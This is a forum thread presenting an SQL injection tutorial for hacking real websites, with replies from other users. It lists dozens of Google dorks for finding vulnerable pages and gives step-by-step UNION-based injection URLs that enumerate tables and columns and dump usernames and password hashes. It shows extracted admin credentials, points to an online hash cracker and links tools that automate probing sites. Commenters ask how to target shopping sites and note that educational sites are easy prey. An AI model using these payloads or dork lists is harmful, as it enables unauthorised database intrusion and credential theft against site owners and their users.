Xeo Hacker Uptill now,we have seen few terms related to hacking and some methods to hack passwords

like phishing,keyloggers etc. Now we are moving a little forward.Now in this thread i m going to post something about SQL INJECTION. Its a type of hacking with the help of which we can hack sites (mostly the newly born sites and educational sites ) ok buddiez lets start and kindly pay attention let your mind think and its just a child play

1). Search for a vulnerable site. ==================== Highlight one then press ctrl+c then ctrl+v at google search engine. allinurl:index.php?id= allinurl:trainers.php?id= allinurl:buy.php?category= allinurl:article.php?ID= allinurl:play_old.php?id= allinurl:newsitem.php?num= allinurl:readnews.php?id= allinurl:top10.php?cat= allinurl:historialeer.php?num= allinurl:reagir.php?num= allinurl:Stray-Questions-View.php?num= allinurl:forum_bds.php?num= allinurl:game.php?id= allinurl:view_product.php?id= allinurl:newsone.php?id= allinurl:sw_comment.php?id= allinurl:news.php?id= allinurl:avd_start.php?avd= allinurl:event.php?id= allinurl:product-item.php?id= allinurl:sql.php?id= allinurl:news_view.php?id= allinurl:select_biblio.php?id= allinurl:humor.php?id= allinurl:aboutbook.php?id= allinurl:ogl_inet.php?ogl_id= allinurl:fiche_spectacle.php?id= allinurl:communique_detail.php?id= allinurl:sem.php3?id= allinurl:kategorie.php4?id=

allinurl:news.php?id= allinurl:index.php?id= allinurl:faq2.php?id= allinurl:show_an.php?id= allinurl:preview.php?id= allinurl:loadpsb.php?id= allinurl:opinions.php?id= allinurl:spr.php?id= allinurl:pages.php?id= allinurl:announce.php?id= allinurl:clanek.php4?id= allinurl:participant.php?id= allinurl:download.php?id= allinurl:main.php?id= allinurl:review.php?id= allinurl:chappies.php?id= allinurl:read.php?id= allinurl:prod_detail.php?id= allinurl:viewphoto.php?id= allinurl:article.php?id= allinurl:person.php?id= allinurl:productinfo.php?id= allinurl:showimg.php?id= allinurl:view.php?id= allinurl:website.php?id= allinurl:hosting_info.php?id= allinurl:gallery.php?id= allinurl:rub.php?idr= allinurl:view_faq.php?id= allinurl:artikelinfo.php?id= allinurl:detail.php?ID= allinurl:index.php?= and this one is just priceless login: * password= * filetype:xls

2)Definitions: ========= inurl: -> is a search parameter in google so that it searches for results in the site's url. .php?5= -> is what i'm searching for in a url, SQL INJECTION works by adding a code after the = symbol. This is also commonly referred as a Dork. Dork definition: It's the part in the site's url that tells you that it can be vulnerable to a certain SQL injection. Let's take this exploit for example: We will check it's vulnerability by adding magic qoute (') at the end of the url. http://site.com/sug_cat.php?parent_id=-1 UNION ALL SELECT login,password FROM dir_login--

3) So the url will be like this: =================== http://www.site.com/news_archive.php?id=5' And we hit enter and we got this result. Database error: Invalid SQL: SELECT * FROM NewsArticle WHERE NewsID=6\'; mySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1) Database error: next_record called with no query pending. mySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1) If you got an error, some text missing or a blank page the site is vulnerable but not at all. Now we know that the site is vulnerable.

4) find the columns : ============= The next step is find out how many columns the database contain To find it we use "order by" (without the qoute) and this string " -- " (no qoute). It will look like this: http://www.site.com/news_archive.php?id=6 order by 1-- (no error) http://www.site.com/news_archive.php?id=6 order by 2-- (no error) http://www.site.com/news_archive.php?id=6 order by 3-- (no error) we move a little higher. (it doesn't matter) http://www.site.com/news_archive.php?id=6 order by 10-- (no error) http://www.site.com/news_archive.php?id=6 order by 14-- (no error) until we got an error: http://www.site.com/news_archive.php?id=6 order by 15-- (we got an error) now we got an error on this column:it will lok like this. Database error: Invalid SQL: SELECT * FROM NewsArticle WHERE NewsID=6 order by 15--; mySQL Error: 1054 (Unknown column '15' in 'order clause') Database error: next_record called with no query pending. mySQL Error: 1054 (Unknown column '15' in 'order clause') this mean the database contain only 14 columns 5)Union select : ========== Now use "-" (negative quote) and union select statement. using this we can select more data in one sql statement.

Look like this: http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14-we hit enter. numbers appears.. Like this: 6 ,5 8 6) Check MYSQL Version ================ Now we will check it's MYSQL VERSION. We will add @@version on the numbers appear on the previous step. lemme say i choose 8.. we will replace 8 with @@version,so it will look like this. http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, @@version, 9, 10, 11, 12, 13, 14-and you will get a result like this: 6 ,5 5.1.32 <--this is the version 7) Getting Table Name. =============== We use group_concat(table_name). replace @@version with group_concat(table_name) and look like this: http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(table_name), 9, 10, 11, 12, 13, 14-were not done already: (don't hit enter) between number 14 and this "--" (quote) insert this: +from+information_schema.tables+whe re+table_schema=database()-it will look like this: http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(table_name), 9, 10, 11, 12, 13, 14+from+information_schema.tables+where+table_schema=database()-we hit enter and got this result: Blurb,FileUpload,Inquiries,NewsArticle,ProjectPhoto,active_sessions_split,auth_u ser_md5 8) Column Name : ============

Now we're done on TABLE NAME, we move on to COLUMN NAME. use this string group_concat(column_name) replace group_concat(table_name) to group_concat(column_name). but before that we must choose one column. i choose auth_user_md5 because this is must or what we want. for better result we need to hex auth_user_md5. Go to this Link: http://home2.paulschou.net/tools/xlate/ p aste auth_user_md5 to the text box and click encode. now we get the hex of auth_user_md5: look like this: 61 75 74 68 5f 75 73 65 72 5f 6d 64 35 before proceeding remove space between each numbers. like this: 617574685f757365725f6d6435 Now replace group_concat(table_name) to group_concat(column_name). like this: http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(column_name), 9, 10, 11, 12, 13, 14+from+information_schema.tables+where+table_schema=database()-replace also +from+information_schema.tables+where+table_schema=database()-to +from+information_schema.columns+where+table_name=0x617574685f757365725f6 d6435-(The yellow letter and numbers is the auth_user_md5 hex we encoded) Note: always add 0x before the hex. Like above. Here is the result: http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(column_name), 9, 10, 11, 12, 13, 14+from+information_schema.columns+where+table_name=0x617574685f757365725 f6d6435-Now hit enter: and you got result like this. UserID,Username,Password,Perms,FirstName,MiddleName,LastName,Position,Emai lAddre ss,ContactNumbers,DateCreated,CreatedBy,DateModified,ModifiedBy,Status

9) Main part : ========= We use 0x3a to obtain what we want from the DATABASE like pass, username, etc..etc.. Replace group_concat(column_name) to group_concat(UserID,0x3a,Username,0x3a,P assword,0x3a,Perms,0x3a,FirstName,0x3a,M iddleName,0x3a,LastName,0x3a,Position,0x3a,EmailAddress,0x3a,ContactNumbers,0 x3a ,DateCreated,0x3a,CreatedBy,0x3a,DateModified,0x3a,ModifiedBy,0x3aStatus) but i prefer to do this one group_concat(Username,0x3a,Password) for less effort. and replace also information_schema.columns+where+table_name=0x617574685f757365725f6d6435-to +from+auth_user_md5-617574685f757365725f6d6435 is the hex value of auth_user_md5 so we replace it.

Result look like this: http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7,group_concat(Username,0x3a,Password), 9, 10, 11, 12, 13, 14+from+auth_user_md5-i hit enter we got this: admin username: k2admin / admin password in md5 hash:21232f297a57a5a743894a0e4a801fc3 / 97fda9951fd2d6c75ed53484cdc6ee2d 10)Cracking the password : ================= Because the password is in md5 hash we need to crack it. http://passcracking.com/index.php pass : x1R0zYB3bex Enjoy u can ask anything u like . ================= Report Shalvendra Sukul Man thats a really sweet tutorial and you put a lot of effort in it but its really hard to come by sites which still have this vulnerability. Usually the input string is now validated and the characters which can be used to test for sql injection, the backtick ( ' ) character, is escaped. The sql error page is also replaced by a custom web page. i believe blind sql injection is a better method if you are choosing to hack mysql database. Report Nasruminallah Zeeshan If I want to find specific sites like Shopping sites using Dorks, how will I compose ? Report

Harith Fahmi maybe its too hard for me.. can't make it. :DD Report Samyak Tejawat Nice post but you can use SQLi Helper to make this very very simple. Report Hackerz World SQL vulnerable sites are still present ...... as i have said usually educational sites are vulnerable ..... If i got any vulnerable I will post it here Its really hard to hack shopping sites as they deal in online money .... so they make their site very secure ... Report

Hackerz World

Some useful sites for SQL : ================= There are some sites which will help in SQL INJECTION SQL VULNEREBILITY FINDER : You can find whether the site iz vulnerable for SQL INJECTION or not thru this link Link : http://sql.wehostsite.com/ The kinda called "part 2" of the sql vuln finder script of mine, just enter the vulnerable site url and it will return you the following *Order by *Selection Id *Version *Database name Link: http://orderby.wehostsite.com/ Can also check much more about SQL Injection here ====> http://hackwithstyle.blogspot.com/search/label/SQL%20Injection Report Nasruminallah Zeeshan It is nice. I want to find "specific topic related" site5 through Dorks. For example: I want to find the sites containing about "watches" so how will I compose the Dork for it ?